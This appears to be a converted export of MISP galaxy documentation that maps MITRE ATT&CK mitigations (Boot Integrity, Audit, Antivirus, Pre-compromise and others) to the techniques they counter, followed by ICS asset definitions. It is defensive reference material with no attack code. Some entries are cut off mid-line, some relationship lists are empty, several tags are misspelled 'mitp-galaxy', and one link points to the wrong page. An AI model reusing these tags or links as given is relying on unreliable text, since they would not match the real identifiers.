- mitigates: `misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554"` with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"

Table 4124. Table References

Links

https://attack.mitre.org/mitigations/M1045

Boot Integrity - M1046

Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.

The tag is: misp-galaxy:mitre-course-of-action="Boot Integrity - M1046"

Boot Integrity - M1046 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Compromise Hardware Supply Chain - T1195.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-
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• mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004" with estimative-language:likelihood-probability="almost-certain"


Table 4125. Table References

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</table>

**Scripting Mitigation - T1064**

Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.

Configure Office security settings enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy. (Citation: Microsoft Block Office Macros) Other types of virtualization and application microsegmentation may also mitigate the impact of compromise. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

The tag is: misp-galaxy:mitre-course-of-action="Scripting Mitigation - T1064"

Scripting Mitigation - T1064 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"

Table 4126. Table References

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<td><a href="https://attack.mitre.org/mitigations/T1064">https://attack.mitre.org/mitigations/T1064</a></td>
</tr>
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</table>

**Bootkit Mitigation - T1067**

Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted
boots process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)

The tag is: *misp-galaxy:mitre-course-of-action="Bootkit Mitigation - T1067"*

**Bootkit Mitigation - T1067** has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="Bootkit - T1067"* with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003"* with estimative-language:likelihood-probability="almost-certain"

**Table 4127. Table References**

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<td><a href="https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process">https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process</a></td>
</tr>
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</table>

**PowerShell Mitigation - T1086**

It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. (Citation: Netspi PowerShell Execution Policy Bypass) Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.

The tag is: *misp-galaxy:mitre-course-of-action="PowerShell Mitigation - T1086"*

**PowerShell Mitigation - T1086** has relationships with:


**Table 4128. Table References**

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<td><a href="https://attack.mitre.org/mitigations/T1086">https://attack.mitre.org/mitigations/T1086</a></td>
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</table>

**Timestomp Mitigation - T1099**

Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing
potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestamping by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action*="Timestomp Mitigation - T1099"

Timestomp Mitigation - T1099 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Timestomp - T1099" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/mitigations/T1099">https://attack.mitre.org/mitigations/T1099</a></td>
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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
</tr>
</tbody>
</table>

### Regsvr32 Mitigation - T1117

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET)

The tag is: *misp-galaxy:mitre-course-of-action*="Regsvr32 Mitigation - T1117"

Regsvr32 Mitigation - T1117 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117" with estimative-language:likelihood-probability="almost-certain"

### Table 4130. Table References

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<td><a href="https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET">https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET</a></td>
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</table>
InstallUtil Mitigation - T1118

InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="InstallUtil Mitigation - T1118"

InstallUtil Mitigation - T1118 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118" with estimative-language:likelihood-probability="almost-certain"

Table 4131. Table References

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<td><a href="https://attack.mitre.org/mitigations/T1118">https://attack.mitre.org/mitigations/T1118</a></td>
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</table>

CMSTP Mitigation - T1191

CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation). Consider using application whitelisting configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries. (Citation: MSitPros CMSTP Aug 2017)

The tag is: misp-galaxy:mitre-course-of-action="CMSTP Mitigation - T1191"

CMSTP Mitigation - T1191 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1191" with estimative-language:likelihood-probability="almost-certain"

Table 4132. Table References

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<tr>
<td><a href="https://msitpros.com/?p=3960">https://msitpros.com/?p=3960</a></td>
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</table>

Keychain Mitigation - T1142

The password for the user’s login keychain can be changed from the user’s login password. This increases the complexity for an adversary because they need to know an additional password.

The tag is: misp-galaxy:mitre-course-of-action="Keychain Mitigation - T1142"

Keychain Mitigation - T1142 has relationships with:

Launchctl Mitigation - T1152

Prevent users from installing their own launch agents or launch daemons and instead require them to be pushed out by group policy.

The tag is: *misp-galaxy:mitre-course-of-action*="Launchctl Mitigation - T1152"

Launchctl Mitigation - T1152 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern*="Launchctl - T1152" with *estimative-language:*likelihood-probability="almost-certain"

Source Mitigation - T1153

Due to potential legitimate uses of source commands, it's may be difficult to mitigate use of this technique.

The tag is: *misp-galaxy:mitre-course-of-action*="Source Mitigation - T1153"

Source Mitigation - T1153 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern*="Source - T1153" with *estimative-language:*likelihood-probability="almost-certain"

Trap Mitigation - T1154

Due to potential legitimate uses of trap commands, it's may be difficult to mitigate use of this technique.

The tag is: *misp-galaxy:mitre-course-of-action*="Trap Mitigation - T1154"

Trap Mitigation - T1154 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern*="Trap - T1154" with *estimative-language:*likelihood-probability="almost-certain"
HISTCONTROL Mitigation - T1148

Prevent users from changing the `<code>HISTCONTROL</code>` environment variable (Citation: Securing bash history). Also, make sure that the `<code>HISTCONTROL</code>` environment variable is set to “ignoredup” instead of “ignoreboth” or “ignorespace”.

The tag is: `misp-galaxy:mitre-course-of-action="HISTCONTROL Mitigation - T1148"`

HISTCONTROL Mitigation - T1148 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148"` with estimative-language:likelihood-probability="almost-certain"

Defacement Mitigation - T1491

Implementing best practices for websites such as defending against [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) (Citation: OWASP Top 10 2017). Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

The tag is: `misp-galaxy:mitre-course-of-action="Defacement Mitigation - T1491"`

Defacement Mitigation - T1491 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Defacement - T1491"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001"` with estimative-language:likelihood-probability="almost-certain"
AppleScript Mitigation - T1155

Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing (Citation: applescript signing). This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.

The tag is: *misp-galaxy:mitre-course-of-action="AppleScript Mitigation - T1155"*

AppleScript Mitigation - T1155 has relationships with:


Table 4139. Table References

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<td><a href="https://attack.mitre.org/mitigations/T1155">https://attack.mitre.org/mitigations/T1155</a></td>
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</table>

Sudo Mitigation - T1169

The sudoers file should be strictly edited such that passwords are always required and that users can’t spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.

The tag is: *misp-galaxy:mitre-course-of-action="Sudo Mitigation - T1169"*

Sudo Mitigation - T1169 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="Sudo - T1169" with estimative-language:likelihood-probability="almost-certain"

Table 4140. Table References

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<td><a href="https://attack.mitre.org/mitigations/T1169">https://attack.mitre.org/mitigations/T1169</a></td>
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Hooking Mitigation - T1179

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely
have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

The tag is: misp-galaxy:mitre-course-of-action="Hooking Mitigation - T1179"

Hooking Mitigation - T1179 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Hooking - T1179" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/mitigations/T1179">https://attack.mitre.org/mitigations/T1179</a></td>
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**Pre-compromise - M1056**

This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.

The tag is: misp-galaxy:mitre-course-of-action="Pre-compromise - M1056"

Pre-compromise - M1056 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Gather Victim Host Information - T1592" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Active Scanning - T1595" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Firmware - T1592.003" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Hardware - T1592.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="DNS - T1590.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="IP Addresses - T1590.005" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Network Topology - T1590.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Trust Dependencies - T1590.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Gather Victim Org Information - T1591" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Determine Physical Locations - T1591.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Identify Business Tempo - T1591.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Search Closed Sources - T1597" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Purchase Technical Data - T1597.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Threat Intel Vendors - T1597.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Search Open Technical Databases - T1596" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Scan Databases - T1596.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="WHOIS - T1596.002" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Search Engines - T1593.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Social Media - T1593.001" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Acquire Infrastructure - T1583" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Botnet - T1583.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="DNS Server - T1583.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1586.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584" with estimative-language:likelihood-probability="almost-certain"
• mitigates: mitp-galaxy:mitre-attack-pattern="Botnet - T1584.005" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: mitp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588" with estimative-language:likelihood-probability="almost-certain"
• mitigates: mitp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003" with estimative-language:likelihood-probability="almost-certain"
• mitigates: mitp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: mitp-galaxy:mitre-attack-pattern="Exploits - T1588.005" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: mitp-galaxy:mitre-attack-pattern="Vulnerabilities - T1588.006" with estimative-language:likelihood-probability="almost-certain"
• mitigates: mitp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="Upload Tool - T1608.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Install Digital Certificate - T1608.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Link Target - T1608.005" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/mitigations/M1056">https://attack.mitre.org/mitigations/M1056</a></td>
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</table>

**Antivirus/Antimalware - M1049**

Use signatures or heuristics to detect malicious software.

The tag is: misp-galaxy:mitre-course-of-action="Antivirus/Antimalware - M1049"

Antivirus/Antimalware - M1049 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with
Attestation - M1002

Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.

The tag is: *misp-galaxy:mitre-course-of-action*="Attestation - M1002"

Attestation - M1002 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern*="Modify OS Kernel or Boot Partition - T1398" with estimative-language:likelihood-probability="almost-certain"
- mitigates: *misp-galaxy:mitre-attack-pattern*="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"

Audit - M1047

Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

The tag is: *misp-galaxy:mitre-course-of-action*="Audit - M1047"

Audit - M1047 has relationships with:
• mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="At (Linux) - T1053.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Launchd - T1053.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1546.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Confluence - T1213.001" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Infrastructure - T1578" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Create Snapshot - T1578.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Create Cloud Instance - T1578.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"

Table 4145. Table References

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<td><a href="https://attack.mitre.org/mitigations/M1047">https://attack.mitre.org/mitigations/M1047</a></td>
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</table>

**Assets**

A list of asset categories that are commonly found in industrial control systems.

> Assets is a cluster galaxy available in JSON format at [this location](https://attack.mitre.org/mitigations/M1047) The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**

MITRE

**Control Server**

A device which acts as both a server and controller, that hosts the control software used in communicating with lower-level control devices in an ICS network (e.g. Remote Terminal Units (RTUs) and Programmable Logic Controllers (PLCs)).
Data Historian

A centralized database located on a computer installed in the control system DMZ supporting external corporate user data access for archival and analysis using statistical process control and other techniques.

Engineering Workstation

The engineering workstation is usually a high-end very reliable computing platform designed for configuration, maintenance and diagnostics of the control system applications and other control system equipment. The system is usually made up of redundant hard disk drives, high speed network interface, reliable CPUs, performance graphics hardware, and applications that provide configuration and monitoring tools to perform control system application development, compilation and distribution of system modifications.

Field Controller/RTU/PLC/IED

Controller terminology depends on the type of system they are associated with. They provide typical processing capabilities. Controllers, sometimes referred to as Remote Terminal Units (RTU) and Programmable Logic Controllers (PLC), are computerized control units that are typically rack or panel mounted with modular processing and interface cards. The units are collocated with the process equipment and interface through input and output modules to the various sensors and controlled devices. Most utilize a programmable logic-based application that provides scanning and writing of data to and from the IO interface modules and communicates with the control system network via various communications methods, including serial and network communications.

Human-Machine Interface

In computer science and human-computer interaction, the Human-Machine Interface (HMI) refers to the graphical, textual and auditory information the program presents to the user (operator).
